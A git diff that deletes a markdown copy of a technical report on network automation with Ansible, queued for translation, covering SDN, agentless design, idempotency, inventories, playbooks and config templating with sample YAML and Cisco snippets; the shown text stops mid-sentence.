100644 sources/tech/20160325 Network automation with Ansible.md diff --git a/sources/tech/20160325 Network automation with Ansible.md b/sources/tech/20160325 Network automation with Ansible.md deleted file mode 100644 index 6072731a74..0000000000 --- a/sources/tech/20160325 Network automation with Ansible.md +++ /dev/null @@ -1,993 +0,0 @@ -Translating by qhwdw Network automation with Ansible -================ - -### Network Automation - -As the IT industry transforms with technologies from server virtualization to public and private clouds with self-service capabilities, containerized applications, and Platform as a Service (PaaS) offerings, one of the areas that continues to lag behind is the network. - -Over the past 5+ years, the network industry has seen many new trends emerge, many of which are categorized as software-defined networking (SDN). - -###### Note - -SDN is a new approach to building, managing, operating, and deploying networks. The original definition for SDN was that there needed to be a physical separation of the control plane from the data (packet forwarding) plane, and the decoupled control plane must control several devices. - -Nowadays, many more technologies get put under the _SDN umbrella_, including controller-based networks, APIs on network devices, network automation, whitebox switches, policy networking, Network Functions Virtualization (NFV), and the list goes on. - -For purposes of this report, we refer to SDN solutions as solutions that include a network controller as part of the solution, and improve manageability of the network but don’t necessarily decouple the control plane from the data plane. - -One of these trends is the emergence of application programming interfaces (APIs) on network devices as a way to manage and operate these devices and truly offer machine to machine communication. APIs simplify the development process when it comes to automation and building network applications, providing more structure on how data is modeled. For example, when API-enabled devices return data in JSON/XML, it is structured and easier to work with as compared to CLI-only devices that return raw text that then needs to be manually parsed. - -Prior to APIs, the two primary mechanisms used to configure and manage network devices were the command-line interface (CLI) and Simple Network Management Protocol (SNMP). If we look at each of those, the CLI was meant as a human interface to the device, and SNMP wasn’t built to be a real-time programmatic interface for network devices. - -Luckily, as many vendors scramble to add APIs to devices, sometimes _just because_ it’s a check in the box on an RFP, there is actually a great byproduct—enabling network automation. Once a true API is exposed, the process for accessing data within the device, as well as managing the configuration, is greatly simplified, but as we’ll review in this report, automation is also possible using more traditional methods, such as CLI/SNMP. - -###### Note - -As network refreshes happen in the months and years to come, vendor APIs should no doubt be tested and used as key decision-making criteria for purchasing network equipment (virtual and physical). Users should want to know how data is modeled by the equipment, what type of transport is used by the API, if the vendor offers any libraries or integrations to automation tools, and if open standards/protocols are being used. - -Generally speaking, network automation, like most types of automation, equates to doing things faster. While doing more faster is nice, reducing the time for deployments and configuration changes isn’t always a problem that needs solving for many IT organizations. - -Including speed, we’ll now take a look at a few of the reasons that IT organizations of all shapes and sizes should look at gradually adopting network automation. You should note that the same principles apply to other types of automation as well. - - -### Simplified Architectures - -Today, every network is a unique snowflake, and network engineers take pride in solving transport and application issues with one-off network changes that ultimately make the network not only harder to maintain and manage, but also harder to automate. - -Instead of thinking about network automation and management as a secondary or tertiary project, it needs to be included from the beginning as new architectures and designs are deployed. Which features work across vendors? Which extensions work across platforms? What type of API or automation tooling works when using particular network device platforms? When these questions get answered earlier on in the design process, the resulting architecture becomes simpler, repeatable, and easier to maintain _and_ automate, all with fewer vendor proprietary extensions enabled throughout the network. - -### Deterministic Outcomes - -In an enterprise organization, change review meetings take place to review upcoming changes on the network, the impact they have on external systems, and rollback plans. In a world where a human is touching the CLI to make those _upcoming changes_, the impact of typing the wrong command is catastrophic. Imagine a team with three, four, five, or 50 engineers. Every engineer may have his own way of making that particular _upcoming change_. And the ability to use a CLI or a GUI does not eliminate or reduce the chance of error during the control window for the change. - -Using proven and tested network automation helps achieve more predictable behavior and gives the executive team a better chance at achieving deterministic outcomes, moving one step closer to having the assurance that the task is going to get done right the first time without human error. - - -### Business Agility - -It goes without saying that network automation offers speed and agility not only for deploying changes, but also for retrieving data from network devices as fast as the business demands. Since the advent of server virtualization, server and virtualization admins have had the ability to deploy new applications almost instantaneously. And the faster applications are deployed, the more questions are raised as to why it takes so long to configure a VLAN, route, FW ACL, or load-balancing policy. - -By understanding the most common workflows within an organization and _why_ network changes are really required, the process to deploy modern automation tooling such as Ansible becomes much simpler. - -This chapter introduced some of the high-level points on why you should consider network automation. In the next section, we take a look at what Ansible is and continue to dive into different types of network automation that are relevant to IT organizations of all sizes. - - -### What Is Ansible? - -Ansible is one of the newer IT automation and configuration management platforms that exists in the open source world. It’s often compared to other tools such as Puppet, Chef, and SaltStack. Ansible emerged on the scene in 2012 as an open source project created by Michael DeHaan, who also created Cobbler and cocreated Func, both of which are very popular in the open source community. Less than 18 months after the Ansible open source project started, Ansible Inc. was formed and received $6 million in Series A funding. It became and is still the number one contributor to and supporter of the Ansible open source project. In October 2015, Red Hat acquired Ansible Inc. - -But, what exactly is Ansible? - -_Ansible is a super-simple automation platform that is agentless and extensible._ - -Let’s dive into this statement in a bit more detail and look at the attributes of Ansible that have helped it gain a significant amount of traction within the industry. - - -### Simple - -One of the most attractive attributes of Ansible is that you _DO NOT_ need any special coding skills in order to get started. All instructions, or tasks to be automated, are documented in a standard, human-readable data format that anyone can understand. It is not uncommon to have Ansible installed and automating tasks in under 30 minutes! - -For example, the following task from an Ansible playbook is used to ensure a VLAN exists on a Cisco Nexus switch: - -``` -- nxos_vlan: vlan_id=100 name=web_vlan -``` - -You can tell by looking at this almost exactly what it’s going to do without understanding or writing any code! - -###### Note - -The second half of this report covers the Ansible terminology (playbooks, plays, tasks, modules, etc.) in great detail. However, we have included a few brief examples in the meantime to convey key concepts when using Ansible for network automation. - -### Agentless - -If you look at other tools on the market, such as Puppet and Chef, you’ll learn that, by default, they require that each device you are automating have specialized software installed. This is _NOT_ the case with Ansible, and this is the major reason why Ansible is a great choice for networking automation. - -It’s well understood that IT automation tools, including Puppet, Chef, CFEngine, SaltStack, and Ansible, were initially built to manage and automate the configuration of Linux hosts to increase the pace at which applications are deployed. Because Linux systems were being automated, getting agents installed was never a technical hurdle to overcome. If anything, it just delayed the setup, since now _N_ number of hosts (the hosts you want to automate) needed to have software deployed on them. - -On top of that, when agents are used, there is additional complexity required for DNS and NTP configuration. These are services that most environments do have already, but when you need to get something up fairly quick or simply want to see what it can do from a test perspective, it could significantly delay the overall setup and installation process. - -Since this report is meant to cover Ansible for network automation, it’s worth pointing out that having Ansible as an agentless platform is even more compelling to network admins than to sysadmins. Why is this? - -It’s more compelling for network admins because as mentioned, Linux operating systems are open, and anything can be installed on them. For networking, this is definitely not the case, although it is gradually changing. If we take the most widely deployed network operating system, Cisco IOS, as just one example and ask the question, _"Can third-party software be installed on IOS based platforms?"_ it shouldn’t come as a surprise that the answer is _NO_. - -For the last 20+ years, nearly all network operating systems have been closed and vertically integrated with the underlying network hardware. Because it’s not so easy to load an agent on a network device (router, switch, load balancer, firewall, etc.) without vendor support, having an automation platform like Ansible that was built from the ground up to be agentless and extensible is just what the doctor ordered for the network industry. We can finally start eliminating manual interactions with the network with ease! - -### Extensible - -Ansible is also extremely extensible. As open source and code start to play a larger role in the network industry, having platforms that are extensible is a must. This means that if the vendor or community doesn’t provide a particular feature or function, the open source community, end user, customer, consultant, or anyone else can _extend_ Ansible to enable a given set of functionality. In the past, the network vendor or tool vendor was on the hook to provide the new plug-ins and integrations. Imagine using an automation platform like Ansible, and your network vendor of choice releases a new feature that you _really_ need automated. While the network vendor or Ansible could in theory release the new plug-in to automate that particular feature, the great thing is, anyone from your internal engineers to your value-added reseller (VARs) or consultant could now provide these integrations. - -It is a fact that Ansible is extremely extensible because as stated, Ansible was initially built to automate applications and systems. It is because of Ansible’s extensibility that Ansible integrations have been written for network vendors, including but not limited to Cisco, Arista, Juniper, F5, HP, A10, Cumulus, and Palo Alto Networks. - - -### Why Ansible for Network Automation? - -We’ve taken a brief look at what Ansible is and also some of the benefits of network automation, but why should Ansible be used for network automation? - -In full transparency, many of the reasons already stated are what make Ansible such as great platform for automating application deployments. However, we’ll take this a step further now, getting even more focused on networking, and continue to outline a few other key points to be aware of. - - -### Agentless - -The importance of an agentless architecture cannot be stressed enough when it comes to network automation, especially as it pertains to automating existing devices. If we take a look at all devices currently installed at various parts of the network, from the DMZ and campus, to the branch and data center, the lion’s share of devices do _NOT_ have a modern device API. While having an API makes things so much simpler from an automation perspective, an agentless platform like Ansible makes it possible to automate and manage those _legacy_ _(traditional)_ devices, for example, _CLI-based devices_, making it a tool that can be used in any network environment. - -###### Note - -If CLI-only devices are integrated with Ansible, the mechanisms as to how the devices are accessed for read-only and read-write operations occur through protocols such as telnet, SSH, and SNMP. - -As standalone network devices like routers, switches, and firewalls continue to add support for APIs, SDN solutions are also emerging. The one common theme with SDN solutions is that they all offer a single point of integration and policy management, usually in the form of an SDN controller. This is true for solutions such as Cisco ACI, VMware NSX, Big Switch Big Cloud Fabric, and Juniper Contrail, as well as many of the other SDN offerings from companies such as Nuage, Plexxi, Plumgrid, Midokura, and Viptela. This even includes open source controllers such as OpenDaylight. - -These solutions all simplify the management of networks, as they allow an administrator to start to migrate from box-by-box management to network-wide, single-system management. While this is a great step in the right direction, these solutions still don’t eliminate the risks for human error during change windows. For example, rather than configure _N_ switches, you may need to configure a single GUI that could take just as long in order to make the required configuration change—it may even be more complex, because after all, who prefers a GUI _over_ a CLI! Additionally, you may possibly have different types of SDN solutions deployed per application, network, region, or data center. - -The need to automate networks, for configuration management, monitoring, and data collection, does not go away as the industry begins migrating to controller-based network architectures. - -As most software-defined networks are deployed with a controller, nearly all controllers expose a modern REST API. And because Ansible has an agentless architecture, it makes it extremely simple to automate not only legacy devices that may not have an API, but also software-defined networking solutions via REST APIs, all without requiring any additional software (agents) on the endpoints. The net result is being able to automate any type of device using Ansible with or without an API. - - -### Free and Open Source Software (FOSS) - -Being that Ansible is open source with all code publicly accessible on GitHub, it is absolutely free to get started using Ansible. It can literally be installed and providing value to network engineers in minutes. Ansible, the open source project, or Ansible Inc., do not require any meetings with sales reps before they hand over software either. That is stating the obvious, since it’s true for all open source projects, but being that the use of open source, community-driven software within the network industry is fairly new and gradually increasing, we wanted to explicitly make this point. - -It is also worth stating that Ansible, Inc. is indeed a company and needs to make money somehow, right? While Ansible is open source, it also has an enterprise product called Ansible Tower that adds features such as role-based access control (RBAC), reporting, web UI, REST APIs, multi-tenancy, and much more, which is usually a nice fit for enterprises looking to deploy Ansible. And the best part is that even Ansible Tower is _FREE_ for up to 10 devices—so, at least you can get a taste of Tower to see if it can benefit your organization without spending a dime and sitting in countless sales meetings. - - -### Extensible - -We stated earlier that Ansible was primarily built as an automation platform for deploying Linux applications, although it has expanded to Windows since the early days. The point is that the Ansible open source project did not have the goal of automating network infrastructure. The truth is that the more the Ansible community understood how flexible and extensible the underlying Ansible architecture was, the easier it became to _extend_ Ansible for their automation needs, which included networking. Over the past two years, there have been a number of Ansible integrations developed, many by industry independents such as Matt Oswalt, Jason Edelman, Kirk Byers, Elisa Jasinska, David Barroso, Michael Ben-Ami, Patrick Ogenstad, and Gabriele Gerbino, as well as by leading networking network vendors such as Arista, Juniper, Cumulus, Cisco, F5, and Palo Alto Networks. - - -### Integrating into Existing DevOps Workflows - -Ansible is used for application deployments within IT organizations. It’s used by operations teams that need to manage the deployment, monitoring, and management of various types of applications. By integrating Ansible with the network infrastructure, it expands what is possible when new applications are turned up or migrated. Rather than have to wait for a new top of rack (TOR) switch to be turned up, a VLAN to be added, or interface speed/duplex to be checked, all of these network-centric tasks can be automated and integrated into existing workflows that already exist within the IT organization. - - -### Idempotency - -The term _idempotency_ (pronounced item-potency) is used often in the world of software development, especially when working with REST APIs, as well as in the world of _DevOps_ automation and configuration management frameworks, including Ansible. One of Ansible’s beliefs is that all Ansible modules (integrations) should be idempotent. Okay, so what does it mean for a module to be idempotent? After all, this is a new term for most network engineers. - -The answer is simple. Being idempotent allows the defined task to run one time or a thousand times without having an adverse effect on the target system, only ever making the change once. In other words, if a change is required to get the system into its desired state, the change is made; and if the device is already in its desired state, no change is made. This is unlike most traditional custom scripts and the copy and pasting of CLI commands into a terminal window. When the same command or script is executed repeatedly on the same system, errors are (sometimes) raised. Ever paste a command set into a router and get some type of error that invalidates the rest of your configuration? Was that fun? - -Another example is if you have a text file or a script that configures 10 VLANs, the same commands are then entered 10 times _EVERY_ time the script is run. If an idempotent Ansible module is used, the existing configuration is gathered first from the network device, and each new VLAN being configured is checked against the current configuration. Only if the new VLAN needs to be added (or changed—VLAN name, as an example) is a change or command actually pushed to the device. - -As the technologies become more complex, the value of idempotency only increases because with idempotency, you shouldn’t care about the _existing_ state of the network device being modified, only the _desired_ state that you are trying to achieve from a network configuration and policy perspective. - - -### Network-Wide and Ad Hoc Changes - -One of the problems solved with configuration management tools is configuration drift (when a device’s desired configuration gradually drifts, or changes, over time due to manual change and/or having multiple disparate tools being used in an environment)—in fact, this is where tools like Puppet and Chef got started. Agents _phone home_ to the head-end server, validate its configuration, and if a change is required, the change is made. The approach is simple enough. What if an outage occurs and you need to troubleshoot though? You usually bypass the management system, go direct to a device, find the fix, and quickly leave for the day, right? Sure enough, at the next time interval when the agent phones back home, the change made to fix the problem is overwritten (based on how the _master/head-end server_ is configured). One-off changes should always be limited in highly automated environments, but tools that still allow for them are greatly valuable. As you guessed, one of these tools is Ansible. - -Because Ansible is agentless, there is not a default push or pull to prevent configuration drift. The tasks to automate are defined in what is called an Ansible playbook. When using Ansible, it is up to the user to run the playbook. If the playbook is to be executed at a given time interval and you’re not using Ansible Tower, you will definitely know how often the tasks are run; if you are just using the native Ansible command line from a terminal prompt, the playbook is run once and only once. - -Running a playbook once by default is attractive for network engineers. It is added peace of mind that changes made manually on the device are not going to be automatically overwritten. Additionally, the scope of devices that a playbook is executed against is easily changed when needed such that even if a single change needs to automate only a single device, Ansible can still be used. The _scope_ of devices is determined by what is called an Ansible inventory file; the inventory could have one device or a thousand devices. - -The following shows a sample inventory file with two groups defined and a total of six network devices: - -``` -[core-switches] -dc-core-1 -dc-core-2 - -[leaf-switches] -leaf1 -leaf2 -leaf3 -leaf4 -``` - -To automate all hosts, a snippet from your play definition in a playbook looks like this: - -``` -hosts: all -``` - -And to automate just one leaf switch, it looks like this: - -``` -hosts: leaf1 -``` - -And just the core switches: - -``` -hosts: core-switches -``` - -###### Note - -As stated previously, playbooks, plays, and inventories are covered in more detail later on this report. - -Being able to easily automate one device or _N_ devices makes Ansible a great choice for making those one-off changes when they are required. It’s also great for those changes that are network-wide: possibly for shutting down all interfaces of a given type, configuring interface descriptions, or adding VLANs to wiring closets across an enterprise campus network. - -### Network Task Automation with Ansible - -This report is gradually getting more technical in two areas. The first area is around the details and architecture of Ansible, and the second area is about exactly what types of tasks can be automated from a network perspective with Ansible. The latter is what we’ll take a look at in this chapter. - -Automation is commonly equated with speed, and considering that some network tasks don’t require speed, it’s easy to see why some IT teams don’t see the value in automation. VLAN configuration is a great example because you may be thinking, "How _fast_ does a VLAN really need to get created? Just how many VLANs are being added on a daily basis? Do _I_ really need automation?” - -In this section, we are going to focus on several other tasks where automation makes sense such as device provisioning, data collection, reporting, and compliance. But remember, as we stated earlier, automation is much more than speed and agility as it’s offering you, your team, and your business more predictable and more deterministic outcomes. - -### Device Provisioning - -One of the easiest and fastest ways to get started using Ansible for network automation is creating device configuration files that are used for initial device provisioning and pushing them to network devices. - -If we take this process and break it down into two steps, the first step is creating the configuration file, and the second is pushing the configuration onto the device. - -First, we need to decouple the _inputs_ from the underlying vendor proprietary syntax (CLI) of the config file. This means we’ll have separate files with values for the configuration parameters such as VLANs, domain information, interfaces, routing, and everything else, and then, of course, a configuration template file(s). For this example, this is our standard golden template that’s used for all devices getting deployed. Ansible helps bridge the gap between rendering the inputs and values with the configuration template. In less than a few seconds, Ansible can generate hundreds of configuration files predictably and reliably. - -Let’s take a quick look at an example of taking a current configuration and decomposing it into a template and separate variables (inputs) file. - -Here is an example of a configuration file snippet: - -``` -hostname leaf1 -ip domain-name ntc.com -! -vlan 10 - name web -! -vlan 20 - name app -! -vlan 30 - name db -! -vlan 40 - name test -! -vlan 50 - name misc -``` - -If we extract the input values, this file is transformed into a template. - -###### Note - -Ansible uses the Python-based Jinja2 templating language, thus the template called _leaf.j2_ is a Jinja2 template. - -Note that in the following example the _double curly braces_ denote a variable. - -The resulting template looks like this and is given the filename _leaf.j2_: - -``` -! -hostname {{ inventory_hostname }} -ip domain-name {{ domain_name }} -! -! -{% for vlan in vlans %} -vlan {{ vlan.id }} - name {{ vlan.name }} -{% endfor %} -! -``` - -Since the double curly braces denote variables, and we see those values are not in the template, they need to be stored somewhere. They get stored in a variables file. A matching variables file for the previously shown template looks like this: - -``` ---- -hostname: leaf1 -domain_name: ntc.com -vlans: - - { id: 10, name: web } - - { id: 20, name: app } - - { id: 30, name: db } - - { id: 40, name: test } - - { id: 50, name: misc } -``` - -This means if the team that controls VLANs wants to add a VLAN to the network devices, no problem. Have them change it in the variables file and regenerate a new config file using the Ansible module called `template`. This whole process is idempotent too; only if there is a change to the template or values being entered will a new configuration file be generated. - -Once the configuration is generated, it needs to be _pushed_ to the network device. One such method to push configuration files to network devices is using the open source Ansible module called `napalm_install_config`. - -The next example is a sample playbook to _build and push_ a configuration to network devices. Again, this playbook uses the `template` module to build the configuration files and the `napalm_install_config` to push them and activate them as the new running configurations on the devices. - -Even though every line isn’t reviewed in the example, you can still make out what is actually happening. - -###### Note - -The following playbook introduces new concepts such as the built-in variable `inventory_hostname`. These concepts are covered in [Ansible Terminology and Getting Started][1]. - -``` ---- - - - name: BUILD AND PUSH NETWORK CONFIGURATION FILES - hosts: leaves - connection: local - gather_facts: no - - tasks: - - name: BUILD CONFIGS - template: - src=templates/leaf.j2 - dest=configs/{{inventory_hostname }}.conf - - - name: PUSH CONFIGS - napalm_install_config: - hostname={{ inventory_hostname }} - username={{ un }} - password={{ pwd }} - dev_os={{ os }} - config_file=configs/{{ inventory_hostname }}.conf - commit_changes=1 - replace_config=0 -``` - -This two-step process is the simplest way to get started with network automation using Ansible. You simply template your configs, build config files, and push them to the network device—otherwise known as the _BUILD and PUSH_ method. - -###### Note - -Another example like this is reviewed in much more detail in [Ansible Network Integrations][2]. - - -### Data Collection and Monitoring - -Monitoring tools typically use SNMP—these tools poll certain management information bases (MIBs) and return data to the monitoring tool. Based on the data being returned, it may be more or less than you actually need. What if interface stats are being polled? You are likely getting back every counter that is displayed in a _show interface_ command. What if you only need _interface resets_ and wish to see these resets correlated to the interfaces that have CDP/LLDP neighbors on them? Of course, this is possible with current technology; it could be you are running multiple show commands and parsing the output manually, or you’re using an SNMP-based tool but going between tabs in the GUI trying to find the data you actually need. How does Ansible help with this? - -Being that Ansible is totally open and extensible, it’s possible to collect and monitor the exact counters or values needed. This may require some up-front custom work but is totally worth it in the end, because the data being gathered is what you need, not what the vendor is providing you. Ansible also provides intuitive ways to perform certain tasks conditionally, which means based on data being returned, you can perform subsequent tasks, which may be to collect more data or to make a configuration change. - -Network devices have _A LOT_ of static and ephemeral data buried inside, and Ansible helps extract the bits you need. - -You can even use Ansible modules that use SNMP behind the scenes, such as a module called `snmp_device_version`. This is another open source module that exists within the community: - -``` - - name: GET SNMP DATA - snmp_device_version: - host=spine - community=public - version=2c -``` - -Running the preceding task returns great information about a device and adds some level of discovery capabilities to Ansible. For example, that task returns the following data: - -``` -{"ansible_facts": {"ansible_device_os": "nxos", "ansible_device_vendor": "cisco", "ansible_device_version": "7.0(3)I2(1)"}, "changed": false} -``` - -You can now determine what type of device something is without knowing up front. All you need to know is the read-only community string of the device. - - -### Migrations - -Migrating from one platform to the next is never an easy task. This may be from the same vendor or from different vendors. Vendors may offer a script or a tool to help with migrations. Ansible can be used to build out configuration templates for all types of network devices and operating systems in such a way that you could generate a configuration file for all vendors given a defined and common set of inputs (common data model). Of course, if there are vendor proprietary extensions, they’ll need to be accounted for, too. Having this type of flexibility helps with not only migrations, but also disaster recovery (DR), as it’s very common to have different switch models in the production and DR data centers, maybe even different vendors. - - -### Configuration Management - -As stated, configuration management is the most common type of automation. What Ansible allows you to do fairly easily is create _roles_ to streamline the consumption of task-based automation. From a high level, a role is a logical grouping of reusable tasks that are automated against a particular group of devices. Another way to think about roles is to think about workflows. First and foremost, workflows and processes need to be understood before automation is going to start adding value. It’s always important to start small and expand from there. - -For example, a set of tasks that automate the configuration of routers and switches is very common and is a great place to start. But where do the IP addresses come from that are configured on network devices? Maybe an IP address management solution? Once the IP addresses are allocated for a given function and deployed, does DNS need to be updated too? Do DHCP scopes need to be created? - -Can you see how the workflow can start small and gradually expand across different IT systems? As the workflow continues to expand, so would the role. - - -### Compliance - -As with many forms of automation, making configuration changes with any type of automation tool is seen as a risk. While making manual changes could arguably be riskier, as you’ve read and may have experienced firsthand, Ansible has capabilities to automate data collection, monitoring, and configuration building, which are all "read-only" and "low risk" actions. One _low risk_ use case that can use the data being gathered is configuration compliance checks and configuration validation. Does the deployed configuration meet security requirements? Are the required networks configured? Is protocol XYZ disabled? Since each module, or integration, with Ansible returns data, it is quite simple to _assert_ that something is _TRUE_ or _FALSE_. And again, based on _it_ being _TRUE_ or _FALSE_, it’s up to you to determine what happens next—maybe it just gets logged, or maybe a complex operation is performed. - -### Reporting - -We now understand that Ansible can also be used to collect data and perform compliance checks. The data being returned and collected from the device by way of Ansible is up for grabs in terms of what you want to do with it. Maybe the data being returned becomes inputs to other tasks, or maybe you just want to create reports. Being that reports are generated from templates combined with the actual important data to be inserted into the template, the process to create and use reporting templates is the same process used to create configuration templates. - -From a reporting perspective, these templates may be flat text files, markdown files that are viewed on GitHub, HTML files that get dynamically placed on a web server, and the list goes on. The user has the power to create the exact type of report she wishes, inserting the exact data she needs to be part of that report. - -It is powerful to create reports not only for executive management, but also for the ops engineers, since there are usually different metrics both teams need. - - -### How Ansible Works - -After looking at what Ansible can offer from a network automation perspective, we’ll now take a look at how Ansible works. You will learn about the overall communication flow from an Ansible control host to the nodes that are being automated. First, we review how Ansible works _out of the box_, and we then take a look at how Ansible, and more specifically Ansible _modules_, work when network devices are being automated. - -### Out of the Box - -By now, you should understand that Ansible is an automation platform. In fact, it is a lightweight automation platform that is installed on a single server or on every administrator’s laptop within an organization. You decide. Ansible is easily installed using utilities such as pip, apt, and yum on Linux-based machines. - -###### Note - -The machine that Ansible is installed on is referred to as the _control host_ through the remainder of this report. - -The control host will perform all automation tasks that are defined in an Ansible playbook (don’t worry; we’ll cover playbooks and other Ansible terms soon enough). The important piece for now is to understand that a playbook is simply a set of automation tasks and instructions that gets executed on a given number of hosts. - -When a playbook is created, you also need to define which hosts you want to automate. The mapping between the playbook and the hosts to automate happens by using what is known as an Ansible inventory file. This was already shown in an earlier example, but here is another sample inventory file showing two groups: `cisco`and `arista`: - -``` -[cisco] -nyc1.acme.com -nyc2.acme.com - -[arista] -sfo1.acme.com -sfo2.acme.com -``` - -###### Note - -You can also use IP addresses within the inventory file, instead of hostnames. For these examples, the hostnames were resolvable via DNS. - -As you can see, the Ansible inventory file is a text file that lists hosts and groups of hosts. You then reference a specific host or a group from within the playbook, thus dictating which hosts get automated for a given play and playbook. This is shown in the following two examples. - -The first example shows what it looks like if you wanted to automate all hosts within the `cisco` group, and the second example shows how to automate just the _nyc1.acme.com_ host: - -``` ---- - - - name: TEST PLAYBOOK - hosts: cisco - - tasks: - - TASKS YOU WANT TO AUTOMATE -``` - -``` ---- - - - name: TEST PLAYBOOK - hosts: nyc1.acme.com - - tasks: - - TASKS YOU WANT TO AUTOMATE -``` - -Now that the basics of inventory files are understood, we can take a look at how Ansible (the control host) communicates with devices _out of the box_ and how tasks are automated on Linux endpoints. This is an important concept to understand, as this is usually different when network devices are being automated. - -There are two main requirements for Ansible to work out of the box to automate Linux-based systems. These requirements are SSH and Python. - -First, the endpoints must support SSH for transport, since Ansible uses SSH to connect to each target node. Because Ansible supports a pluggable connection architecture, there are also various plug-ins available for different types of SSH implementations. - -The second requirement is how Ansible gets around the need to require an _agent_ to preexist on the target node. While Ansible does not require a software agent, it does require an onboard Python execution engine. This execution engine is used to execute Python code that is transmitted from the Ansible control host to the target node being automated. - -If we elaborate on this out of the box workflow, it is broken down as follows: - -1. When an Ansible play is executed, the control host connects to the Linux-based target node using SSH. - -2. For each task, that is, Ansible module being executed within the play, Python code is transmitted over SSH and executed directly on the remote system. - -3. Each Ansible module upon execution on the remote system returns JSON data to the control host. This data includes information such as if the configuration changed, if the task passed/failed, and other module-specific data. - -4. The JSON data returned back to Ansible can then be used to generate reports using templates or as inputs to subsequent modules. - -5. Repeat step 3 for each task that exists within the play. - -6. Repeat step 1 for each play within the playbook. - -Shouldn’t this mean that network devices should work out of the box with Ansible because they also support SSH? It is true that network devices do support SSH, but it is the first requirement combined with the second one that limits the functionality possible for network devices. - -To start, most network devices do not support Python, so it makes using the default Ansible connection mechanism process a non-starter. That said, over the past few years, vendors have added Python support on several different device platforms. However, most of these platforms still lack the integration needed to allow Ansible to get direct access to a Linux shell over SSH with the proper permissions to copy over the required code, create temp directories and files, and execute the code on box. While all the parts are there for Ansible to work natively with SSH/Python _and_ Linux-based network devices, it still requires network vendors to open their systems more than they already have. - -###### Note - -It is worth noting that Arista does offer native integration because it is able to drop SSH users directly into a Linux shell with access to a Python execution engine, which in turn does allow Ansible to use its default connection mechanism. Because we called out Arista, we need to also highlight Cumulus as working with Ansible’s default connection mechanism, too. This is because Cumulus Linux is native Linux, and there isn’t a need to use a vendor API for the automation of the Cumulus Linux OS. - -### Ansible Network Integrations - -The previous section covered the way Ansible works by default. We looked at how Ansible sets up a connection to a device at the beginning of a _play_, executes tasks by copying Python code to the devices, executes the code, and then returns results back to the Ansible control host. - -In this section, we’ll take a look at what this process is when automating network devices with Ansible. As already covered, Ansible has a pluggable connection architecture. For _most_ network integrations, the `connection` parameter is set to `local`. The most common place to make the connection type local is within the playbook, as shown in the following example: - -``` ---- - - - name: TEST PLAYBOOK - hosts: cisco - connection: local - - tasks: - - TASKS YOU WANT TO AUTOMATE -``` - -Notice how within the play definition, this example added the `connection` parameter as compared to the examples in the previous section. - -This tells Ansible not to connect to the target device via SSH and to just connect to the local machine running the playbook. Basically, this delegates the connection responsibility to the actual Ansible modules being used within the _tasks_ section of the playbook. Delegating power for each type of module allows the modules to connect to the device in whatever fashion necessary; this could be NETCONF for Juniper and HP Comware7, eAPI for Arista, NX-API for Cisco Nexus, or even SNMP for traditional/legacy-based systems that don’t have a programmatic API. - -###### Note - -Network integrations in Ansible come in the form of Ansible modules. While we continue to whet your appetite using terminology such as playbooks, plays, tasks, and modules to convey key concepts, each of these terms are finally covered in greater detail in [Ansible Terminology and Getting Started][3] and [Hands-on Look at Using Ansible for Network Automation][4]. - -Let’s take a look at another sample playbook: - -``` ---- - - - name: TEST PLAYBOOK - hosts: cisco - connection: local - - tasks: - - nxos_vlan: vlan_id=10 name=WEB_VLAN -``` - -If you notice, this playbook now includes a task, and this task uses the `nxos_vlan` module. The `nxos_vlan` module is just a Python file, and it is in this file where the connection to the Cisco NX-OS device is made using NX-API. However, the connection could have been set up using any other device API, and this is how vendors and users like us are able to build our own integrations. Integrations (modules) are typically done on a per-feature basis, although as you’ve already seen with modules like `napalm_install_config`, they can be used to _push_ a full configuration file, too. - -One of the major differences is that with the default connection mechanism, Ansible launches a persistent SSH connection to the device, and this connection persists for a given play. When the connection setup and teardown occurs within the module, as with many network modules that use `connection=local`, Ansible is logging in/out of the device on _every_ task versus this happening on the play level. - -And in traditional Ansible fashion, each network module returns JSON data. The only difference is the massaging of this data is happening locally on the Ansible control host versus on the target node. The data returned back to the playbook varies per vendor and type of module, but as an example, many of the Cisco NX-OS modules return back existing state, proposed state, and end state, as well as the commands (if any) that are being sent to the device. - -As you get started using Ansible for network automation, it is important to remember that setting the connection parameter to local is taking Ansible out of the connection setup/teardown process and leaving that up to the module. This is why modules supported for different types of vendor platforms will have different ways of communicating with the devices. - - -### Ansible Terminology and Getting Started - -This chapter walks through many of the terms and key concepts that have been gradually introduced already in this report. These are terms such as _inventory file_, _playbook_, _play_, _tasks_, and _modules_. We also review a few other concepts that are helpful to be aware of when getting started with Ansible for network automation. - -Please reference the following sample inventory file and playbook throughout this section, as they are continuously used in the examples that follow to convey what each Ansible term means. - -_Sample inventory_: - -``` -# sample inventory file -# filename inventory - -[all:vars] -user=admin -pwd=admin - -[tor] -rack1-tor1 vendor=nxos -rack1-tor2 vendor=nxos -rack2-tor1 vendor=arista -rack2-tor2 vendor=arista - -[core] -core1 -core2 -``` - -_Sample playbook_: - -``` ---- -# sample playbook -# filename site.yml - - - name: PLAY 1 - Top of Rack (TOR) Switches - hosts: tor - connection: local - - tasks: - - name: ENSURE VLAN 10 EXISTS ON CISCO TOR SWITCHES - nxos_vlan: - vlan_id=10 - name=WEB_VLAN - host={{ inventory_hostname }} - username=admin - password=admin - when: vendor == "nxos" - - - name: ENSURE VLAN 10 EXISTS ON ARISTA TOR SWITCHES - eos_vlan: - vlanid=10 - name=WEB_VLAN - host={{ inventory_hostname }} - username={{ user }} - password={{ pwd }} - when: vendor == "arista" - - - name: PLAY 2 - Core (TOR) Switches - hosts: core - connection: local - - tasks: - - name: ENSURE VLANS EXIST IN CORE - nxos_vlan: - vlan_id={{ item }} - host={{ inventory_hostname }} - username={{ user }} - password={{ pwd }} - with_items: - - 10 - - 20 - - 30 - - 40 - - 50 -``` - -### Inventory File - -Using an inventory file, such as the preceding one, enables us to automate tasks for specific hosts and groups of hosts by referencing the proper host/group using the `hosts` parameter that exists at the top section of each play. - -It is also possible to store variables within an inventory file. This is shown in the example. If the variable is on the same line as a host, it is a host-specific variable. If the variables are defined within brackets such as `[all:vars]`, it means that the variables are in scope for the group `all`, which is a default group that includes _all_ hosts in the inventory file. - -###### Note - -Inventory files are the quickest way to get started with Ansible, but should you already have a source of truth for network devices such as a network management tool or CMDB, it is possible to create and use a dynamic inventory script rather than a static inventory file. - -### Playbook - -The playbook is the top-level object that is executed to automate network devices. In our example, this is the file _site.yml_, as depicted in the preceding example. A playbook uses YAML to define the set of tasks to automate, and each playbook is comprised of one or more plays. This is analogous to a football playbook. Like in football, teams have playbooks made up of plays, and Ansible playbooks are made up of plays, too. - -###### Note - -YAML is a data format that is supported by all 